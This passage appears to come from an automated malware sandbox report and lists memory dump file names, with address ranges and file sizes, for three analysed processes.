                                                                                                                        • memory/464-51-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-15-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-47-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-45-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-43-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-41-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-39-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-35-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-32-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-27-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-23-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-20-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-14-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-11-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-9-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-37-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-3-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/464-29-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-7-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-21-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-1081-0x0000000005760000-0x00000000057C0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          384KB

                                                                                                                        • memory/464-4-0x0000000005B50000-0x00000000060F4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.6MB

                                                                                                                        • memory/464-25-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-6-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-1080-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/464-17-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-1082-0x0000000005700000-0x000000000574C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/464-1086-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/464-1088-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/464-1087-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/464-1089-0x00000000743EE000-0x00000000743EF000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/464-1090-0x0000000005850000-0x00000000058A4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          336KB

                                                                                                                        • memory/464-1092-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/464-0-0x00000000743EE000-0x00000000743EF000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/464-1-0x0000000000AD0000-0x0000000000BE8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.1MB

                                                                                                                        • memory/464-2-0x0000000005430000-0x000000000551E000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          952KB

                                                                                                                        • memory/2024-1284-0x000001CB2E270000-0x000001CB2E292000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/2024-1292-0x000001CB2E5E0000-0x000001CB2E60A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/4788-2048-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4788-1093-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          120KB

                                                                                                                        • memory/4788-1100-0x0000000005800000-0x000000000590A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.0MB

                                                                                                                        • memory/4788-1101-0x0000000006860000-0x0000000006A22000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.8MB

                                                                                                                        • memory/4788-1102-0x0000000006F60000-0x000000000748C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.2MB

                                                                                                                        • memory/4788-1097-0x0000000005570000-0x00000000055AC000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          240KB

                                                                                                                        • memory/4788-1096-0x0000000003000000-0x0000000003012000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/4788-1099-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4788-1098-0x00000000055B0000-0x00000000055FC000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/4788-1095-0x0000000005CD0000-0x00000000062E8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.1MB

                                                                                                                        • memory/4788-1103-0x00000000067F0000-0x0000000006856000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          408KB

                                                                                                                        • memory/4788-1104-0x0000000006E20000-0x0000000006E96000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          472KB

                                                                                                                        • memory/4788-1105-0x0000000007590000-0x00000000075AE000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          120KB

                                                                                                                        • memory/4788-1106-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4788-1107-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4788-1094-0x00000000743E0000-0x0000000074B90000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB